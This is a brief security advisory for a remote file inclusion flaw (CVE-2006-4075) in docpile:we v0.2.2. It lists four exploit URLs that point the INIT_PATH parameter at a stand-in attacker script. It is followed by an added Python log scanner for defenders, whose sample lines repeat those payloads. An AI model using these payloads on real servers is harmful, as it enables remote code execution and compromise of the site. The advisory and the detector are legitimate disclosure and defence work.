Key information

Vulnerability title: docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability
Published: 2006.08.13
Attack type: Remote
CVE ID: CVE-2006-4075
CVSS base score: 5.1/10

Vulnerability description: This is a Remote File Inclusion (RFI) vulnerability in docpile:we v0.2.2. The vulnerability arises from improper handling of the INIT_PATH parameter, which allows an attacker to include external files on the server.

Exploit examples:
http://www.site.com/[path]/lib/folder.class.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/email.inc.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/document.class.php?INIT_PATH=http://evil_script?
http://www.site.com/[path]/lib/auth.inc.php?INIT_PATH=http://evil_script?

Impact: This vulnerability can lead to partial confidentiality, integrity, and availability impacts, allowing an attacker to potentially execute arbitrary code on the server.

Author: xoron
Contact email: x0r0n[at]hotmail[dot]com
URL: http://docpile-we.berlios.de
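For defenders reviewing web server logs, the following added example (not part of the original advisory or of docpile:we) flags requests whose INIT_PATH value begins with a URL scheme or stream wrapper. The log format (Common Log Format), the `/docpile/` path, `other.php`, the addresses and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The four scripts listed in the advisory.
LISTED = {"folder.class.php", "email.inc.php", "document.class.php", "auth.inc.php"}
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A URL scheme or PHP stream wrapper at the start of the value (http:, ftp:, data:, php: ...).
# Two or more characters before the colon, so a Windows drive letter is not matched.
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]+:", re.I)

def php_name(name):
    # PHP turns dots and spaces in incoming variable names into underscores,
    # so INIT.PATH and INIT+PATH both arrive in the script as INIT_PATH.
    return re.sub(r"[ .]", "_", name)

def rfi_attempt(log_line):
    """Return details of a remote INIT_PATH value in one access-log line, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    script = target.path.rsplit("/", 1)[-1]
    # parse_qsl percent-decodes names and values once, as PHP does.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if php_name(name) == "INIT_PATH" and SCHEME.match(value.strip()):
            return {"script": script, "value": value,
                    "listed": script.lower() in LISTED}
    return None

def scan(lines):
    """Return the hits for every line that carries a remote INIT_PATH value."""
    return [hit for hit in map(rfi_attempt, lines) if hit]

# Constructed sample lines: addresses, paths and timestamps are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Aug/2006:10:00:00 +0000] "GET /docpile/lib/folder.class.php?INIT_PATH=http://evil_script? HTTP/1.1" 200 512',
    '192.0.2.10 - - [13/Aug/2006:10:00:05 +0000] "GET /docpile/lib/auth.inc.php?INIT%2EPATH=HTTP%3A%2F%2Fevil_script%3F HTTP/1.1" 200 512',
    '198.51.100.7 - - [13/Aug/2006:10:01:00 +0000] "GET /docpile/index.php?folder=3 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [13/Aug/2006:10:01:30 +0000] "GET /docpile/lib/email.inc.php?INIT_PATH=../lib/ HTTP/1.1" 200 128',
    '192.0.2.10 - - [13/Aug/2006:10:02:00 +0000] "GET /docpile/lib/other.php?INIT_PATH=ftp://example.invalid/x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with `listed` set to False is still worth reviewing, since it shows the same parameter being probed on a script the advisory does not name.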